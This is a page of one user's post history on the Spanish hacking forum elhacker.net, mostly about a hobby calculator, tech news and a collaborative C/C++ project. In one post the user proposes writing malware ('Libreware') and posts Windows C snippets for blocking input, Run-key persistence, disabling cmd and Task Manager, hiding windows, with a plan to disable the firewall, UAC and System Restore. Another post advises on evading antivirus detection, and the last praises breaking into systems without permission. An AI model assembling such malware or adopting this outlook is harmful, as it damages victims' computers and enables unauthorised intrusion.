elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13
31  Programación / Programación C/C++ / Re: [Source] Calculadora Calc Don 0.7 en: 20 Octubre 2012, 12:19 pm
Buenas compañeros, he estado ocupado todo este tiempo por otros mundillos aprendiendo malware, ing inversa y seg informat. sé que he estado un tiempo sin actualizar la calculadora, 2 mese nada menos  :xD pero más vale tarde que nunca

Versión 0.7 de Calc Don
Os la traigo con algunos cambios importantes. Dicha lista de cambios se encuentra en la 1ª pag de este post.

Lo principal ha sido cambiar a 64 bits, me he decantado por long long int en vez de uint_64 ya que este sólo admite enteros positivos y el otro tanto positivos como negativos...la cosa es que cambiar muuuchas variables entre 1000 y pico lineas tiene huevos la cosa  :P

Otra cosa era lo de que al aparecer el menú si metías una letra se quedaba trancado en un bucle y no iba. Un colega mio era un cabrón y siempre me buscaba los fallos al programa, que mamonazo era pero de los errores se aprende.

Tenía pensado hacer lo de ordenar el código como dijo Avesudra por distintas páginas pero sigo sin acomodarme a trabajar así, por lo que si me da la pica un día de estos quizás lo haga pero en principio no tengo pensamiento.

Bueno, espero que que os guste. Saludos gente!
32  Foros Generales / Noticias / Re: Comodo Dragon 22.0 recién lanzado actualizando el núcleo de Chromium y ... en: 29 Septiembre 2012, 14:36 pm
En cuanto a seguridad este navegador triunfa por goleada absoluta.
33  Programación / Programación C/C++ / Re: [Dudas] Wallhack CS 1.6 en: 25 Septiembre 2012, 17:53 pm
Si te lo detecta por mucho que actualices el codigo dudo que consigas evitarlo, debes de tener muchos conocimientos para conseguirlo. Creo recordar que los cryters utilizan un mecanismo para evitar que los AV´s  los detecten reorganizando el código. En todo caso necesitas conocimientos de programación, ¿que tal lo llevas?

Es lo básico, si no tienes que es lo que creo, te recomiendo que te des una vuelta por el foro y te mires tutoriales. Cuando tengas una idea más clara de como podemos ayudarte te echaremos una mano encantados.
34  Programación / Programación C/C++ / Re: Proyecto C/C++ en: 23 Septiembre 2012, 20:42 pm
Bueno venga, como 0xDani dice que quiere que sea portable optaremos por el chat pero por favor, que no se cambien más de ideas. Dejemos esta por definitiva.

тαптяαпсє si tienes algo de codigo compartelo e intentaremos mejorarlo entre todos, con algo se empieza. la cosa es que yo de sockets poco la verdad  :xD
35  Programación / Programación C/C++ / Re: Proyecto C/C++ en: 23 Septiembre 2012, 20:31 pm
La idea del malware me interesa, llevo tiempo queriendo hacer uno pero hay muchas funciones que no soy capaz de sacar...desbloquear panel de control, desbloquear cmd, desbloquear regedit, añadir al registro para iniciar con windows.

POR FAVOR, ELIJAMOS UN PROYECTO YA Y NO CAMBIEMOS MAS DE IDEA, cojamos este si os parece.

Nombre sugerido... Libreware

Bloquear Teclado y ratón

Código
  1. #include <winable.h>
  2. BlockInput(true);
  3. Sleep(20000);
  4. BlockInput(false);

Copiar al registro

Código
  1. HKEY hkey;
  2. RegOpenKeyEx
  3. (HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
  4. RegSetValueEx(hkey,"Nombre",0,REG_SZ,(const unsigned char*)"C:\\Ruta\\",sizeof"C:\\Ruta\\");        
  5. RegCloseKey(hkey);


Desactivar cmd No me funciona

Código
  1.  
  2. DWORD dwVal = 1;
  3. HKEY hKey;
  4. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Windows\\System", 0, KEY_ALL_ACCESS, &hKey);
  5. RegSetValueEx (hKey, "DisableCMD", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
  6. RegCloseKey(hKey);

Desctivar administrador de tareas No me funciona

Código
  1. HWND TaskMgr;
  2. TaskMgr = FindWindow(NULL,"Windows Task Manager");
  3. if(TaskMgr != NULL) {
  4. PostMessage(TaskMgr,WM_CLOSE,(LPARAM)0,(WPARAM)0);
  5. }

Los pasos que necesitaremos serán estos:

1-Desactivar Firewall.
2-Desactivar UAC.
3-Pegar el PE a Windows/System32
4-Copiarse al registro el Acceso Directo.
5-No deja acceder al usuario al registro (que diga que el admin lo ha desabilitado).
6-Desactivar el Restaurar Sistema.
7-Cerrar procesos

Ventanas Emergentes       
Citar
     
    Boton Ok                MessageBox(NULL, "TEXTO", "TITULO",MB_OK);
     OK y cancel            MessageBox(NULL, "¿Cerrar?", "Test", MB_OKCANCEL);
     Yes, No y cancel     MessageBox(NULL, "¿Cerrar?", "Test", MB_YESNOCANCEL);
     Boton Aceptar         MessageBox(NULL, "¿Cerrar?", "Test", MB_ICONINFORMATION );

Ejecuta ventanas         
                                 
Citar
ShellExecute(NULL, "open","cmd.exe", "ipconfig", NULL, SW_SHOW);

Ocultar la ventana de MS-DOS                
                                 
Citar
FreeConsole();

Oculta la ventana de MS-DOS y WINDOWS,  las 2 lineas
                                 
Citar
HWND ventana=GetForegroundWindow();
                                  ShowWindow(ventana,SW_HIDE);

Pues venga, con todo esto ya tenemos una idea basica, pues empecemos al tema. Lo primero estructurar el code.

 

36  Foros Generales / Noticias / Re: Comparte contenido entre equipos sin señal WiFi en: 23 Septiembre 2012, 20:03 pm
Citar
podrán conectar de un equipo a otro y todo será compatible

Según he entendido, se supone que es como tener un cable RJ45 invisible, vamos que te conectas con otros equipos sin cable y sin internet, pues me gusta la idea la verdad.

Ya me estoy imaginando jugar un torneo de clanes entre colegas al Counter Strike sin necesidad de decenas de cables de por medio.
37  Programación / Programación C/C++ / Re: Proyecto C/C++ en: 23 Septiembre 2012, 16:54 pm
Vale, pues si me dejáis os dejo una idea para empezar...una Agenda, tengo una simple comenzada de hace poco tiempo por aburrimiento.

¿Qué hace?
Hace 3 cosas...guardar en un archivo de texto generado los datos de los clientes tales como nombre, edad...etc.

También muestra dichos datos en la pantalla del programa...pero eso aún no está disponible por falta de tiempo u error...ya no me acuerdo del tiempo que hace  :xD

Código
  1. #include <stdio.h>
  2. #include<windows.h>
  3. main (){
  4. //Variables
  5. FILE *cliente;
  6.     int opcion, edad, tel;  
  7.     char nombre[22], pais[20], cadena[1000];
  8.     //Nombre del programa
  9.     HWND ocultar;
  10. ocultar=GetForegroundWindow();
  11. SetWindowText(ocultar,"Agenda de registros");
  12.     //Titulo del fichero
  13.     cliente = fopen ("Fichero.txt" ,"a");
  14. fprintf (cliente,"\nIniciando...Recopilacion de datos:\n");  
  15. fprintf (cliente,"------------------------------------------------\n");
  16. fclose (cliente);
  17.     system ("color FC");
  18.  
  19.     principio:
  20. system("cls");
  21.     printf ("\nAgenda de registros personales\n");
  22.     printf ("------------------------------\n\n");
  23.     printf ("1- Crear nuevo usuario\n");
  24.     printf ("2- Mostrar usuarios\n");
  25.     printf ("3- Salir\n\n");
  26.     scanf ("%d", &opcion);
  27.     system ("cls");
  28.     switch (opcion){
  29.            case 1:
  30.                 printf ("Introduce el nombre del nuevo usuario: ");
  31.                 fflush(stdin);  
  32.                 fgets(nombre, sizeof(nombre), stdin);
  33.                 nombre[strlen(nombre)-1] = '\0';
  34.                 printf ("Edad: ");
  35.                 scanf ("%d", &edad);
  36.                 printf ("Pais: ");
  37.                 fflush(stdin);  
  38.                 fgets(pais, sizeof(pais), stdin);
  39.                 pais[strlen(pais)-1] = '\0';
  40.                 printf ("Telefono: ");
  41.                 scanf ("%d", &tel);  
  42.                 printf ("\n\nCliente Guardado");
  43.                 fflush(stdin);  
  44.                 getchar();
  45.                 //Pasarlo al archivo de texto                
  46.                 cliente = fopen ("Fichero.txt" ,"a");            
  47.                 fprintf (cliente,"\nUsuario: %s\n",nombre);                
  48.                 fprintf (cliente,"Edad: %d\n",edad);
  49.                 fprintf (cliente,"Pais: %s\n",pais);
  50.                 fprintf (cliente,"Telefono: %d\n",tel);
  51. fprintf (cliente,"\n==========================\n");  
  52.                 fclose (cliente);  
  53.                 goto principio;                                                    
  54.            case 2:
  55.                 cliente = fopen ("Fichero.txt", "r");
  56.                 fflush(stdin);  
  57. fgets(cadena,1000,cliente);
  58.                 fclose(cliente);
  59.                 printf("Informacion recopilada\n");
  60.                 printf("----------------------\n\n");
  61.                 getchar();      
  62.                 goto principio;
  63.            case 3:
  64. break;
  65.            default:
  66.                 printf("\nElije una de las opciones mostradas.\n\n");  
  67. Sleep(2500);  
  68.                 goto principio;
  69.            }
  70. }

Si os parece podemos ir completándola con nuevas características y funciones...¿os gusta la idea?
38  Programación / Programación C/C++ / Re: Proyecto C/C++ en: 23 Septiembre 2012, 15:51 pm
Buenas, me gustaría colaborar en el proyecto ya que pinta muy bien la verdad. Mis conocimientos son bastantes amplios, llevo como 1 años con C y C++ y creó que podría dar la talla. Mi única pega son las librerías externas, sockets, y el diseño de WFA o GTK+ o Qt, por lo demás lo llevo bien.

Yo hice un proyecto en solitario hace ya algún tiempo en el que compañeros de este foro me echaron una mano y salió bien la cosa...se trata de una calculadora llamada Calc Don

http://foro.elhacker.net/programacion_cc/source_calculadora_calc_don_10-t366489.0.html

Bueno, lluk tu eres el que ha ideado el proyecto, cuentanos tu idea y te seguiremos como lider. Que alguien comience con el principio del code y el resto nos la ideamos para completarlo con las nuevas funciones que surjan de una lluvia de ideas...¿os parece?
39  Foros Generales / Noticias / Re: Microsoft da a conocer nuevo LOGOTIPO * en: 24 Agosto 2012, 16:00 pm
Viendo el símbolo del logo da la impresión de que Microsoft va a ir por el camino de sus próximos SO con colores planos al igual que este W8 y eso no me gusta nada, lo veo soso. Espero que no sea nada definitivo.
40  Foros Generales / Foro Libre / Re: ¿Que es lo que mas os gusta de la informatica? en: 21 Agosto 2012, 14:29 pm
La seguridad, en verdad todo el tema de infiltrarse a otros sistemas sin permisos del propietario.

¿Motivo? te sube la adrenalina  :xD
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines